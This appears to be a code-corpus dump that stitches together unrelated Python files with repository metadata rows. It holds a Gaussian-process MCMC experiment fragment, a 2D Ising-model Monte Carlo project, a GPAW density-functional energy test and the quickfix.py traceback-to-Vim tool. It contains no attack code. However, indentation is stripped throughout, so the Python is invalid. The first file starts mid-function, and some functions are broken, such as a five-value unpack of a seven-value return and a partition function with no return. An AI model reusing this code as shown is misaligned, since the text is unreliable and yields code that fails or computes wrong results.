kern = getKern(True)
lik = BinnedPoisson(binSize)
return SGPMCMC(binMids, Y=counts.reshape(-1,1), Z=initialZ, kernel=kern, likelihood=lik)
def build_mc_exact( binMids, binSize, counts, seed):
kern = getKern(False)
lik = BinnedPoisson(binSize)
return GPMCMC( X = binMids, Y=counts.reshape(-1,1), kernel = kern, likelihood = lik )
def init_mc_model_from_vb(m_mcmc, m_vb):
#take the optimized vb model, and use it to init the mcmc mode
m_mcmc.kern[:] = m_vb.kern[:]
m_mcmc.Z[:] = m_vb.Z[:]
m_mcmc.Z.fix()
L = GPy.util.choleskies.flat_to_triang(m_vb.q_u_chol)[0,:,:]
u_sample = np.dot(L, np.random.randn(m_vb.num_inducing))
u_sample += m_vb.q_u_mean.flatten()
L = GPy.util.linalg.jitchol(m_mcmc.kern.K(m_mcmc.Z))
v_sample, _ = GPy.util.linalg.dtrtrs(L, u_sample)
m_mcmc.V[:] = v_sample.reshape(-1,1)
return m_mcmc
def init_exact_mc_model_from_vb( m_mcmc_exact, m_vb ):
#This should speed things up a bit.
m_mcmc_exact.kern[:] = m_vb.kern[:]
function_sample = get_samples_vb( m_vb, 1).flatten()
L = GPy.util.linalg.jitchol(m_mcmc_exact.kern.K(m_mcmc_exact.X))
v_sample , _ = GPy.util.linalg.dtrtrs(L, function_sample)
m_mcmc_exact.V[:] = v_sample.reshape(-1,1)
return m_mcmc_exact
def convertData(X, binsPerDimension):
Y = np.histogramdd( X, bins = (binsPerDimension,binsPerDimension), range = ( (0, 1.) , (0., 1.) ) )
return Y[0].reshape( Y[0].shape[0] * Y[0].shape[1] )
def getInitialInducingGrid( nInducingPoints ):
assert( np.sqrt( nInducingPoints ) == np.floor( np.sqrt( nInducingPoints ) ) ) # check nInducingPoints is a square number.
sqrtNInducingPoints = int( np.floor( np.sqrt( nInducingPoints ) ) )
return getGrid( sqrtNInducingPoints )[1]
def getGrid( nPointsPerDim ):
linearValues = np.linspace( 0., 1., nPointsPerDim+1 )
binEdges = np.array( [ np.array( elem ) for elem in product(linearValues,linearValues) ] )
offsetValues = linearValues[:-1] + 0.5*np.diff( linearValues )[0]
binMids = np.array( [ np.array( elem ) for elem in product(offsetValues,offsetValues) ] )
return binEdges*10., binMids*10.
def run_hmc(m, N, epsilon, Lmax):
def f(x):
return (-a for a in m._objective_grads(x))
samples, rate = HMC(f, N, Lmax=Lmax, epsilon=epsilon, x0=m.optimizer_array, verbose=True)
return samples
def priorSample():
binsPerDimension = 32
num_samples = 5
bin_edges, bin_mids = getGrid( binsPerDimension )
np.random.seed(1)
#There is almost certainly a better way to do this but tempus fugit.
priors = getPriors()
kern = getKern(True)
binArea = np.square( (bin_edges[0,1] - bin_edges[1,1] ) )
from matplotlib import pyplot as plt
for sampleIndex in range(num_samples):
print "\n sample index ", sampleIndex, "\n"
kern.rbf.lengthscale = priors['rbf_lengthscale'].rvs(1)
kern.rbf.variance = priors['rbf_variance'].rvs(1)
kern.bias.variance = priors['bias_variance'].rvs(1)
L = GPy.util.linalg.jitchol(kern.K(bin_mids))
functionSample = np.dot(L, np.random.randn( bin_mids.shape[0] ) )
intensities = np.exp( functionSample )
countSample = np.random.poisson( intensities * binArea )
print "Total counts ", np.sum( countSample )
squareIntensities = intensities.reshape( (binsPerDimension, binsPerDimension ))
squareCounts = countSample.reshape( (binsPerDimension, binsPerDimension ))
plt.figure()
plt.imshow( squareCounts, interpolation='nearest')
plt.title( "Prior sample "+ str(sampleIndex) )
plt.colorbar()
plt.figure()
plt.imshow( squareIntensities, interpolation='nearest')
plt.colorbar()
plt.title( "Prior sample "+ str(sampleIndex) )
class Experiment:
def __init__(self, seed, binsPerDimension , num_inducing, num_samples, vb_iterations, isExact=False):
self.seed, self.binsPerDimension, self.num_inducing, self.num_samples, self.isExact = seed, binsPerDimension, num_inducing, num_samples, isExact
np.random.seed(seed)
X = load_pines()
#will need to change bins to be two dimensional.
self.Y = convertData(X, binsPerDimension)
binEdges, bin_mids = getGrid( binsPerDimension )
initialZ = getInitialInducingGrid( num_inducing )
#setup and optimize VB model.
binArea = np.square( (binEdges[0,1] - binEdges[1,1] ) )
if not(isExact):
self.m_vb = build_vb(initialZ, bin_mids, binArea , self.Y, seed)
self.m_vb = optimize_vb(self.m_vb,vb_iterations)
self.fsamples_vb = get_samples_vb(self.m_vb, 1000)
self.m_mc = build_mc_sparse(initialZ, bin_mids, binArea, self.Y, seed)
self.m_mc = init_mc_model_from_vb(self.m_mc, self.m_vb)
self.samples = run_hmc(self.m_mc, num_samples, 0.125, Lmax = 20)
self.fsamples_mc = get_samples_mc(self.m_mc, self.samples[50::2], 10)
else:
priors = getPriors()
self.m_mc = build_mc_exact( bin_mids, binArea, self.Y, seed )
self.m_mc.kern.rbf.lengthscale.fix(1.)
self.m_mc.kern.rbf.variance.fix(1.)
self.m_mc.kern.white.variance.fix(1e-3)
self.m_mc.optimize('bfgs',messages=True,max_iters = 10000)
self.m_mc.kern.rbf.lengthscale.constrain_positive()
self.m_mc.kern.rbf.variance.constrain_positive()
self.m_mc.kern.white.variance.constrain_positive()
self.m_mc.kern.rbf.lengthscale.set_prior(priors['rbf_lengthscale'])
self.m_mc.kern.rbf.variance.set_prior(priors['rbf_variance'])
self.m_mc.kern.white.variance.fix(1e-3)
self.samples = run_hmc(self.m_mc, num_samples, epsilon=0.1 , Lmax = 20)
#priorSample()
if __name__ == "__main__":
num_samples = 2000
num_vb_iterations = [10000]
Ms = [225]
grids = [64]
#grids = [32]
seeds = [0]
isExact=False
experiments = [Experiment(seed, binsPerDimension=ng, num_inducing=M, num_samples=num_samples, vb_iterations=vb_iterations, isExact=isExact) for seed in seeds for ng in grids for M in Ms for vb_iterations in num_vb_iterations]
#from matplotlib import pyplot as plt
for e in experiments:
#plt.figure()
intensities = np.exp(e.fsamples_mc)*e.m_mc.likelihood.binsize
std = np.std(intensities, axis=1)
intensities = np.mean(intensities,axis=1)
squareIntensities = intensities.reshape( (e.binsPerDimension , e.binsPerDimension ))
#plt.imshow( np.flipud(squareIntensities.T ), interpolation='nearest')
#plt.colorbar()
#plt.title( 'Mean posterior intensity')
np.savetxt( 'intensity_grid%i_M%i_numsamp%i_exact%i.csv'%(e.binsPerDimension, e.num_inducing, e.num_samples, e.isExact),intensities, delimiter=',')
np.savetxt( 'intensity_std%i_M%i_numsamp%i_exact%i.csv'%(e.binsPerDimension, e.num_inducing, e.num_samples, e.isExact),std, delimiter=',')
#plt.figure()
#intensities = np.mean(np.exp(e.fsamples_vb)*e.m_mc.likelihood.binsize,axis=1)
#squareIntensities = intensities.reshape( (e.binsPerDimension , e.binsPerDimension ))
#plt.imshow( np.flipud(squareIntensities.T ), interpolation='nearest')
#plt.colorbar()
#plt.title( 'Mean posterior intensityi vb')
#np.savetxt( 'intensity_vb_grid%i_M%i_numsamp%i.csv'%(e.binsPerDimension, e.num_inducing, e.num_samples),intensities, delimiter=',')
| gpl-2.0 | 6,435,820,772,835,654,000 | 41.066079 | 229 | 0.640591 | false |
larsjbro/FYS4150 | project_4/source/ising2dim_visual_v3.py | 1 | 19386 | # coding=utf-8
# 2-dimensional ising model with visualization
# Written by Kyrre Ness Sjoebaek
from __future__ import division
import matplotlib.pyplot as plt
from numba import jit
import numpy
import numpy as np
import sys
import math
import pygame
from timeit import default_timer as timer
from scipy import integrate
from scipy import special
# Needed for visualize when using SDL
SCREEN = None
FONT = None
BLOCKSIZE = 10
T_CRITICAL = 2./ np.log(1+np.sqrt(2))
@jit(nopython=True)
def periodic(i, limit, add):
"""
Choose correct matrix index with periodic
boundary conditions
Input:
- i: Base index
- limit: Highest \"legal\" index
- add: Number to add or subtract from i
"""
return (i + limit + add) % limit
def dump_to_terminal(spin_matrix, temp, E, M):
# Simple terminal dump
print "temp:", temp, "E:", E, "M:", M
print spin_matrix
def pretty_print_to_terminal(spin_matrix, temp, E, M):
# Pretty-print to terminal
out = ""
size = len(spin_matrix)
for y in xrange(size):
for x in xrange(size):
if spin_matrix.item(x, y) == 1:
out += "X"
else:
out += " "
out += "\n"
print "temp:", temp, "E:", E, "M:", M
print out + "\n"
def display_single_pixel(spin_matrix, temp, E, M):
# SDL single-pixel (useful for large arrays)
size = len(spin_matrix)
SCREEN.lock()
for y in xrange(size):
for x in xrange(size):
if spin_matrix.item(x, y) == 1:
SCREEN.set_at((x, y), (255, 255, 255))
else:
SCREEN.set_at((x, y), (0, 0, 0))
SCREEN.unlock()
pygame.display.flip()
def display_block(spin_matrix, temp, E, M):
# SDL block (usefull for smaller arrays)
size = len(spin_matrix)
SCREEN.lock()
for y in xrange(size):
for x in xrange(size):
if spin_matrix.item(x, y) == 1:
rect = pygame.Rect(x * BLOCKSIZE, y * BLOCKSIZE, BLOCKSIZE, BLOCKSIZE)
pygame.draw.rect(SCREEN, (255, 255, 255), rect)
else:
rect = pygame.Rect(x * BLOCKSIZE, y * BLOCKSIZE, BLOCKSIZE, BLOCKSIZE)
pygame.draw.rect(SCREEN, (0, 0, 0), rect)
SCREEN.unlock()
pygame.display.flip()
def display_block_with_data(spin_matrix, E, M):
# SDL block w/ data-display
size = len(spin_matrix)
SCREEN.lock()
for y in xrange(size):
for x in xrange(size):
if spin_matrix.item(x, y) == 1:
rect = pygame.Rect(x * BLOCKSIZE, y * BLOCKSIZE, BLOCKSIZE, BLOCKSIZE)
pygame.draw.rect(SCREEN, (255, 255, 255), rect)
else:
rect = pygame.Rect(x * BLOCKSIZE, y * BLOCKSIZE, BLOCKSIZE, BLOCKSIZE)
pygame.draw.rect(SCREEN, (0, 0, 0), rect)
s = FONT.render("<E> = %5.3E; <M> = %5.3E" % E, M, False, (255, 0, 0))
SCREEN.blit(s, (0, 0))
SCREEN.unlock()
pygame.display.flip()
def get_visualize_function(method):
vis_methods = {0: dump_to_terminal,
1:pretty_print_to_terminal,
2:display_single_pixel, # (useful for large arrays)
3:display_block, # (usefull for smaller arrays)
4:display_block_with_data}
def plot_nothing(spin_matrix, temp, E, M):
pass
return vis_methods.get(method, plot_nothing)
def visualize(spin_matrix, temp, E, M, method):
"""
Visualize the spin matrix
Methods:
method = -1:No visualization (testing)
method = 0: Just print it to the terminal
method = 1: Pretty-print to terminal
method = 2: SDL/pygame single-pixel
method = 3: SDL/pygame rectangle
"""
get_visualize_function(method)(spin_matrix, temp, E, M)
@jit(nopython=True)
def metropolis(E, M, w, size, spin_matrix):
# Metropolis
# Loop over all spins, pick a random spin each time
number_of_accepted_configurations = 0
for s in xrange(size**2):
x = int(numpy.random.random() * size)
y = int(numpy.random.random() * size)
deltaE = 2 * spin_matrix[x, y] * (spin_matrix[periodic(x, size, -1), y]
+ spin_matrix[periodic(x, size, 1), y]
+ spin_matrix[x, periodic(y, size, -1)]
+ spin_matrix[x, periodic(y, size, 1)])
accept = numpy.random.random() <= w[deltaE + 8]
if accept:
spin_matrix[x, y] *= -1
M += 2 * spin_matrix[x, y]
E += deltaE
number_of_accepted_configurations += 1
return E, M, number_of_accepted_configurations
@jit(nopython=True)
def _compute_initial_energy(spin_matrix, size):
# Calculate initial energy
E = 0
for j in xrange(size):
for i in xrange(size):
E -= spin_matrix[i, j] * (spin_matrix[periodic(i, size, -1), j]
+ spin_matrix[i, periodic(j, size, 1)])
return E
def monteCarlo(temp, size, trials, visualizer=None, spin_matrix='ordered'):
"""
Calculate the energy and magnetization
(\"straight\" and squared) for a given temperature
Input:
- temp: Temperature to calculate for units Kb Kelvin / J
- size: dimension of square matrix
- trials: Monte-carlo trials (how many times do we
flip the matrix?)
- visual_method: What method should we use to visualize?
Output:
- E_av: Energy of matrix averaged over trials, normalized to spins**2
- E_variance: Variance of energy, same normalization * temp**2
- M_av: Magnetic field of matrix, averaged over trials, normalized to spins**2
- M_variance: Variance of magnetic field, same normalization * temp
- Mabs: Absolute value of magnetic field, averaged over trials
- Mabs_variance
- num_accepted_configs
"""
if visualizer is None:
visualizer = get_visualize_function(method=None) # No visualization
# Setup spin matrix, initialize to ground state
if spin_matrix == 'ordered':
spin_matrix = numpy.zeros((size, size), numpy.int8) + 1
elif spin_matrix == 'random':
spin_matrix = np.array(numpy.random.random(size=(size, size))>0.5, dtype=numpy.int8)
else:
raise NotImplementedError('method')
# Create and initialize variables
E_av = E2_av = M_av = M2_av = Mabs_av = 0.0
# Setup array for possible energy changes
w = numpy.zeros(17, dtype=float)
for de in xrange(-8, 9, 4): # include +8
w[de + 8] = math.exp(-de / temp)
# Calculate initial magnetization:
M = spin_matrix.sum()
E = _compute_initial_energy(spin_matrix, size)
total_accepted_configs = 0
# Start metropolis MonteCarlo computation
for i in xrange(trials):
E, M, num_accepted_configs = metropolis(E, M, w, size, spin_matrix)
# Update expectation values
total_accepted_configs += num_accepted_configs
E_av += E
E2_av += E**2
M_av += M
M2_av += M**2
Mabs_av += int(math.fabs(M))
visualizer(spin_matrix, temp, E / float(size**2), M / float(size**2))
# Normalize average values
E_av /= float(trials)
E2_av /= float(trials)
M_av /= float(trials)
M2_av /= float(trials)
Mabs_av /= float(trials)
# Calculate variance and normalize to per-point and temp
E_variance = (E2_av - E_av * E_av) / float(size * size * temp * temp)
M_variance = (M2_av - M_av * M_av) / float(size * size * temp)
Mabs_variance = (M2_av - Mabs_av * Mabs_av) / float(size * size * temp)
# Normalize returned averages to per-point
E_av /= float(size * size)
M_av /= float(size * size)
Mabs_av /= float(size * size)
return E_av, E_variance, M_av, M_variance, Mabs_av, Mabs_variance, total_accepted_configs
def initialize_pygame(size, method):
global SCREEN, FONT
# Initialize pygame
if method == 2 or method == 3 or method == 4:
pygame.init()
if method == 2:
SCREEN = pygame.display.set_mode((size, size))
elif method == 3:
SCREEN = pygame.display.set_mode((size * 10, size * 10))
elif method == 4:
SCREEN = pygame.display.set_mode((size * 10, size * 10))
FONT = pygame.font.Font(None, 12)
def partition2(T):
'''
Return the partition2 function for 2x2 lattice
Parameters:
-----------
T: arraylike
normalized temperature in units of kb*K/J, kb = boltzmann's constant, K = Kelvin,
J is the coupling constant expressing the strength of the interaction between neighbouring spins
'''
z = 12+4*np.cosh(8.0/T)
return z
def partition(T, size=2):
'''
Return the partition function for size x size lattice
Parameters:
-----------
T: arraylike
normalized temperature in units of kb*K/J, kb = boltzmann's constant, K = Kelvin,
J is the coupling constant expressing the strength of the interaction between neighbouring spins
'''
kappa = 2*np.sinh(2./T)/np.cosh(2./T)**2
N = size**2
k1 = special.ellipk(kappa**2)
def energy_mean_asymptotic(T):
'''
Return mean energy for size x size lattice normalized by spins**2 * size **2
Parameters:
-----------
T: arraylike
normalized temperature in units of kb*K/J, kb = boltzmann's constant, K = Kelvin,
J is the coupling constant expressing the strength of the interaction between neighbouring spins
Output:
- E_av: mean of energy, normalized to spins**2
page 428 in lecture notes
'''
denominator = np.tanh(2.0/T)
kappa = 2*denominator/np.cosh(2./T)
k1 = special.ellipk(kappa**2)
# k = 1./np.sinh(2.0/T)**2
# def integrand(theta):
# return 1./np.sqrt(1-4.*k*(np.sin(theta)/(1+k))**2)
# k11, abserr = integrate.quad(integrand, 0, np.pi/2, epsabs=1e-3, epsrel=1e-3)
return -(1+ 2/np.pi *(2*denominator**2-1)*k1)/denominator
def energy_mean2(T):
'''
Return mean energy for 2 x 2 lattice normalized by spins**2 * 4
Parameters:
-----------
T: arraylike
normalized temperature in units of kb*K/J, kb = boltzmann's constant, K = Kelvin,
J is the coupling constant expressing the strength of the interaction between neighbouring spins
Output:
- E_av: mean of energy, normalized to spins**2
'''
size = 2
return -8*np.sinh(8.0/T)/(np.cosh(8.0/T)+3)/size**2
def energy_variance2(T):
'''
Return variance of energy for 2 x 2 lattice normalized by spins**2 * 4 * T**2
Output:
-E_variance: Variance of energy, same normalization * temp**2 per cell
'''
size = 2
return 64.0*(1.+3.*np.cosh(8.0/T))/(np.cosh(8.0/T)+3)**2 / size**2 / T**2
def energy_variance(T):
'''
Return variance of energy for size x size lattice normalized by spins**2 * size**2 * T**2
Output:
-E_variance: Variance of energy, same normalization * temp**2 per cell
'''
tanh2 = np.tanh(2./T)**2
kappa = 2*np.sinh(2./T)/np.cosh(2./T)**2
# N = size**2
k1 = special.ellipk(kappa**2)
k2 = special.ellipe(kappa**2)
return 4/np.pi * (k1-k2 -(1-tanh2)*(np.pi/2+(2*tanh2-1)*k1))/tanh2/T**2
def energy_mean_and_variance2(temperature):
return energy_mean2(temperature), energy_variance2(temperature)
def specific_heat2(T):
return energy_variance2(T)
def magnetization_spontaneous_asymptotic(T):
""" Return spontaneous magnetization for size x size lattice normalized by spins**2 * size**2
for T < Tc= 2.269
"""
tanh2 = np.tanh(1./T)**2
return (1 - (1-tanh2)**4/(16*tanh2**2))**(1./8) # pp 429
# return (1 - 1./np.sinh(2./T)**4)**(1./8)
def magnetization_mean2(T):
'''
Output:
- M_av: Magnetic field of matrix, averaged over trials, normalized to spins**2 per cell
'''
return np.where(T>T_CRITICAL, 0, magnetization_spontaneous_asymptotic(T))
def magnetization_variance2(T):
"""Return variance of magnetization for 2 x 2 lattice normalized by spins**2 * 4 * T"""
size = 2 * 2
denominator = np.cosh(8./T) + 3
mean = magnetization_mean2(T) * size
sigma = 8.0 * (np.exp(8./T) + 1) / denominator - mean**2
return sigma / size / T
def magnetization_mean_and_variance2(T):
"""Return normalized mean and variance for the moments of a 2 X 2 ising model."""
return magnetization_mean2(T), magnetization_variance2(T)
def susceptibility2(T):
'''
Output:
- M_variance: Variance of magnetic field, same normalization * temp
'''
return magnetization_variance2(T)
def magnetization_abs_mean2(T):
'''
Lattice 2x2
Output:
- Mabs: Absolute value of magnetic field, averaged over trials per cell
'''
size = 2
return (2*np.exp(8.0/T)+4)/(np.cosh(8.0/T)+3)/size**2
def magnetization_abs_mean_and_variance2(temperature):
"""Return normalized mean and variance for the moments of a 2 X 2 ising model."""
beta = 1. / temperature
size = 2
denominator = (np.cosh(8 * beta) + 3)
mean = 2 * (np.exp(8 * beta) + 2) / denominator
sigma = (8 * (np.exp(8 * beta) + 1) / denominator - mean**2) / temperature
return mean / size**2, sigma / size**2
def read_input():
"""
method = -1:No visualization (testing)
method = 0: Just print it to the terminal
method = 1: Pretty-print to terminal
method = 2: SDL/pygame single-pixel
method = 3: SDL/pygame rectangle
"""
if len(sys.argv) == 5:
size = int(sys.argv[1])
trials = int(sys.argv[2])
temperature = float(sys.argv[3])
method = int(sys.argv[4])
else:
print "Usage: python", sys.argv[0],\
"lattice_size trials temp method"
sys.exit(0)
if method > 4:
print "method < 3!"
sys.exit(0)
return size, trials, temperature, method
def plot_abs_error_size2(trial_sizes, data, names, truths, temperature):
for i, truth in enumerate(truths):
name = names[i]
print i
plt.loglog(trial_sizes, np.abs(data[:,i] - truth), label=name)
plt.title('T={} $[k_b K / J]$'.format(temperature))
plt.ylabel('Absolute error')
plt.xlabel('Number of trials')
plt.legend(framealpha=0.2)
def plot_rel_error_size2(trial_sizes, data, names, truths, temperature):
for i, truth in enumerate(truths):
name = names[i]
print i
if truth == 0:
scale = 1e-3
else:
scale = np.abs(truth) + 1e-16
plt.loglog(trial_sizes, np.abs(data[:,i] - truth)/scale, label=name)
plt.title('T={} $[k_b K / J]$'.format(temperature))
plt.ylabel('Relative error')
plt.xlabel('Number of trials')
plt.legend(framealpha=0.2)
def compute_monte_carlo(temperature, size, trial_sizes, spin_matrix='ordered'):
data = []
for trials in trial_sizes:
print trials
t0 = timer()
data.append(monteCarlo(temperature, size, trials, spin_matrix=spin_matrix))
print 'elapsed time: {} seconds'.format(timer() - t0)
data = np.array(data)
names = ['Average Energy per spin $E/N$',
'Specific Heat per spin $C_V/N$',
'Average Magnetization per spin $M/N$',
'Susceptibility per spin $var(M)/N$',
'Average |Magnetization| per spin $|M|/N$',
'Variance of |Magnetization| per spin $var(|M|)/N$',
'Number of accepted configurations']
return data, names
def plot_mean_energy_and_magnetization(trial_sizes, data, names, temperature, spin_matrix='ordered'):
ids = [0, 4]
for i in ids:
name = names[i]
print i
plt.semilogx(trial_sizes, data[:,i], label=name)
plt.title('T={} $[k_b K / J]$, {} spin matrix'.format(temperature, spin_matrix))
plt.ylabel('E or |M|')
plt.xlabel('Number of trials')
plt.legend()
def plot_total_number_of_accepted_configs(trial_sizes, data, names, temperature, spin_matrix='ordered'):
i = 6
# for i in ids:
name = names[i]
print i
plt.loglog(trial_sizes, data[:,i], label=name)
x = np.log(trial_sizes)
y = np.log(data[:, i])
mask = np.isfinite(y)
p = np.polyfit(x[mask], y[mask], deg=1)
sgn = '+' if p[1] > 0 else '-'
label_p = 'exp({:2.1f} {} {:2.1f} ln(x))'.format(p[0], sgn, abs(p[1]))
plt.loglog(trial_sizes, np.exp(np.polyval(p, x)), label=label_p)
plt.title('T={} $[k_b K / J]$, {} spin matrix'.format(temperature, spin_matrix))
plt.ylabel('')
plt.xlabel('Number of trials')
plt.legend()
def main(size, trials, temperature, method):
initialize_pygame(size, method)
visualizer = get_visualize_function(method)
(E_av, E_variance, M_av, M_variance, Mabs_av) = monteCarlo(temperature, size, trials, visualizer)
print "T=%15.8E E[E]=%15.8E Var[E]=%15.8E E[M]=%15.8E Var[M]=%15.8E E[|M|]= %15.8E\n" % (temperature, E_av, E_variance, M_av, M_variance, Mabs_av)
pygame.quit()
def task_b(temperatures=(1, 2.4)):
size = 2
trial_sizes = 10**np.arange(1, 6)
for temperature in temperatures:
data, names = compute_monte_carlo(temperature, size, trial_sizes)
truths = (energy_mean_and_variance2(temperature)
+ magnetization_mean_and_variance2(temperature)
+ magnetization_abs_mean_and_variance2(temperature))
plt.figure()
plot_abs_error_size2(trial_sizes, data, names, truths, temperature)
plt.savefig('task_b_abserr_T{}_size{}.png'.format(temperature, 2))
plt.figure()
plot_rel_error_size2(trial_sizes, data, names, truths, temperature)
plt.savefig('task_b_relerr_T{}_size{}.png'.format(temperature, 2))
# plt.show('hold')
def task_c(temperatures=(1,)):
trial_sizes = [10, 30, 100, 300, 1000, 3000, 10000, 30000, 100000] # 10**np.arange(1, 5)
for temperature in temperatures:
print temperature
size = 20
for spin_matrix in ['ordered', 'random']:
data, names = compute_monte_carlo(temperature, size, trial_sizes, spin_matrix)
plt.figure()
plot_mean_energy_and_magnetization(trial_sizes, data, names, temperature, spin_matrix)
plt.savefig('task_c_T{}_size{}_{}.png'.format(temperature, 20, spin_matrix))
plt.figure()
plot_total_number_of_accepted_configs(trial_sizes, data, names, temperature, spin_matrix)
plt.savefig('task_c_accepted_T{}_size{}_{}.png'.format(temperature, 20, spin_matrix))
# plt.show('hold')
if __name__ == '__main__':
# T=2.4
#
# print energy_mean2(T), energy_mean_asymptotic(T), magnetization_spontaneous_asymptotic(T), magnetization_mean2(T)
# print energy_variance2(T)/energy_variance(T)
# task_b(temperatures=(1,2.4))
# task_c(temperatures=(1, 2.0, 2.4, 5, 10))
task_c(temperatures=(1, 2.4))
plt.show('hold')
# Main program
# # Get input
# # size, trials, temperature, method = read_input()
# size = 2
# trials = 1000
# temperature = 4
# method = -1
#
# main(size, trials, temperature, method)
# print energy_mean_and_variance2(temperature)
# print magnetization_mean_and_variance2(temperature)
# print magnetization_abs_mean_and_variance2(temperature)
| bsd-2-clause | -7,475,104,795,903,891,000 | 30.419773 | 150 | 0.599608 | false |
robwarm/gpaw-symm | gpaw/test/big/tpss/tpss.py | 1 | 3276 | from ase import Atoms
from ase.structure import molecule
from ase.parallel import paropen
from gpaw import GPAW, Mixer, MixerDif
from gpaw.utilities.tools import split_formula
cell = [14.4, 14.4, 14.4]
data = paropen('data.txt', 'a')
##Reference from J. Chem. Phys. Vol 120 No. 15, 15 April 2004, page 6898
tpss_de = [
('H2' , 112.9),
('LiH', 59.1),
('OH' , 106.8),
('HF' , 139.1),
('Li2', 22.5),
('LiF', 135.7),
('Be2', 8.1),
('CO' , 254.2),
('N2' , 227.7),
('O2' , 126.9),
('F2' , 46.4),
('P2' , 116.1),
('Cl2', 60.8)
]
exp_bonds_dE = [
('H2' , 0.741,109.5),
('LiH', 1.595,57.8),
('OH' , 0.970,106.4),
('HF' , 0.917,140.8),
('Li2', 2.673,24.4),
('LiF', 1.564,138.9),
('Be2', 2.440,3.0),
('CO' , 1.128,259.3),
('N2' , 1.098,228.5),
('O2' , 1.208,120.5),
('F2' , 1.412,38.5),
('P2' , 1.893,117.3),
('Cl2', 1.988,58.0)
]
systems = [ a[0] for a in tpss_de ]
ref = [ a[1] for a in tpss_de ]
# Add atoms
for formula in systems:
temp = split_formula(formula)
for atom in temp:
if atom not in systems:
systems.append(atom)
energies = {}
# Calculate energies
i = 0
for formula in systems:
if formula == 'Be2':
loa = Atoms('Be2', [(0, 0, 0), (0, 0, 2.0212)])
else:
loa = molecule(formula)
loa.set_cell(cell)
loa.center()
width = 0.0
calc = GPAW(h=.18,
nbands=-5,
maxiter=333,
xc='PBE',
txt=formula + '.txt')
if len(loa) == 1:
calc.set(hund=True)
calc.set(fixmom=True)
calc.set(mixer=MixerDif())
calc.set(eigensolver='cg')
else:
calc.set(mixer=Mixer())
pos = loa.get_positions()
pos[1,:] = pos[0,:] + [exp_bonds_dE[i][1],0.0,0.0]
loa.set_positions(pos)
loa.center()
loa.set_calculator(calc)
try:
energy = loa.get_potential_energy()
difft = calc.get_xc_difference('TPSS')
diffr = calc.get_xc_difference('revTPSS')
diffm = calc.get_xc_difference('M06L')
energies[formula]=(energy, energy+difft, energy+diffr,energy+diffm)
except:
print >>data, formula, 'Error'
else:
print >>data, formula, energy, energy+difft, energy+diffr, energy+diffm
data.flush()
i += 1
#calculate atomization energies
ii =0
file = paropen('atom_en.dat', 'a')
print >>file, "# formula \t PBE \t TPSS \t revTPSS \t M06L \t Exp"
for formula in systems[:13]:
try:
atoms_formula = split_formula(formula)
de_tpss = -1.0 * energies[formula][1]
de_revtpss = -1.0 * energies[formula][2]
de_m06l = -1.0 * energies[formula][3]
de_pbe = -1.0 * energies[formula][0]
for atom_formula in atoms_formula:
de_tpss += energies[atom_formula][1]
de_revtpss += energies[atom_formula][2]
de_m06l += energies[atom_formula][3]
de_pbe += energies[atom_formula][0]
except:
print >>file, formula, 'Error'
else:
de_tpss *= 627.5/27.211
de_revtpss *= 627.5/27.211
de_m06l *= 627.5/27.211
de_pbe *= 627.5/27.211
out = "%s\t%.1f \t%.1f \t%.1f \t%.1f \t%.1f" %(formula, de_pbe, de_tpss, de_revtpss, de_m06l ,exp_bonds_dE[ii][2])
print >>file, out
file.flush()
ii += 1
| gpl-3.0 | -2,241,574,817,692,573,400 | 26.3 | 122 | 0.545482 | false |
tonyxty/quickfix.py | src/quickfix_py/cli.py | 1 | 4853 | #!/usr/bin/env python3
"""Run a Python script and format the exception traceback as Vim quickfix.
quickfix.py
Copyright (C) 2015 Tony Beta Lambda <[email protected]>
This file is licensed under the MIT license. See LICENSE for more details.
"""
import os
import sys
import functools
import argparse
from runpy import run_path
from traceback import extract_tb
from contextlib import redirect_stdout
from quickfix_py import __version__
def run(filename, catch_interrupt=False):
exceptions = (
(Exception, KeyboardInterrupt) if catch_interrupt else Exception
)
try:
run_path(filename, run_name="__main__")
except exceptions:
_, e, tb = sys.exc_info()
return e, extract_tb(tb)[3:]
def extract_error_location(exc, filename_filter=None):
e, tb = exc
if isinstance(e, SyntaxError):
# yield the line triggering SyntaxError
yield (e.filename, e.lineno, "{}: {}".format(type(e).__name__, e.msg))
if tb is not None:
r = (
(filename, lineno, "in function " + fnname)
for filename, lineno, fnname, text in tb
if text is not None
)
if filename_filter is not None:
r = (_ for _ in r if filename_filter(_[0]))
r = list(r)
try:
filename, lineno, _ = r.pop()
except IndexError:
return
# insert error message to the first returned location
yield filename, lineno, "{}: {}".format(type(e).__name__, e)
yield from reversed(r)
# writable by user and directory components do not start with a dot
@functools.lru_cache(maxsize=32)
def is_user_heuristic(filename):
return os.access(filename, os.W_OK) and not any(
s != "." and s.startswith(".") for s in filename.split(os.sep)
)
def get_parser():
"""Defines options for quickfix.py."""
parser = argparse.ArgumentParser(
prog="quickfix.py",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description=(
"run a Python script and format the exception "
"traceback as Vim quickfix"
),
epilog="Fork me on GitHub: https://github.com/tonyxty/quickfix.py",
)
parser.add_argument(
"-v", "--verbose", action="store_true", help="be more verbose"
)
parser.add_argument(
"-V",
"--version",
action="version",
version="%(prog)s {}".format(__version__),
)
parser.add_argument("-o", "--output", help="specify quickfix output file")
parser.add_argument(
"-i",
"--interrupt",
action="store_true",
help="catch ^C (useful when locating an infinite loop)",
)
parser.add_argument(
"-a",
"--all",
action="store_true",
help="print all files instead of just user files",
)
parser.add_argument(
"-f",
"--fuck",
action="store_true",
help=(
"print a line of command that opens $EDITOR / sensible-editor "
"at the last error location"
),
)
return parser
def main(args=None):
invocation = sys.argv[0]
parser = get_parser()
(options, args) = parser.parse_known_args(args)
if invocation == "thefuck.py":
options.fuck = True
sys.argv[:] = args
if len(args) > 0 and (args[0] == "python3" or args[0] == "python"):
filename_index = 1
else:
filename_index = 0
try:
filename = args[filename_index]
except IndexError:
if options.fuck:
print("#", end=" ")
print("no file given")
return 2
if options.output is not None:
exc = run(filename, options.interrupt)
else:
# suppress output of exec'ed script
with open(os.devnull, "w") as f:
with redirect_stdout(f):
exc = run(filename, options.interrupt)
if exc is not None:
filename_filter = None if options.all else is_user_heuristic
err_locs = extract_error_location(exc, filename_filter)
if options.output is not None:
outfile = open(options.output, "w")
else:
outfile = sys.stdout
if options.fuck:
try:
filename, lineno, _ = next(err_locs)
except StopIteration:
print("# no fuck given", file=outfile)
print(
os.getenv("EDITOR", "sensible-editor")
+ " {} +{}".format(filename, lineno),
file=outfile,
)
else:
print(
"\n".join('"{}":{}: {}'.format(*loc) for loc in err_locs),
file=outfile,
)
if outfile is not sys.stdout:
outfile.close()
return 1
return 0
if __name__ == "__main__":
sys.exit(main())
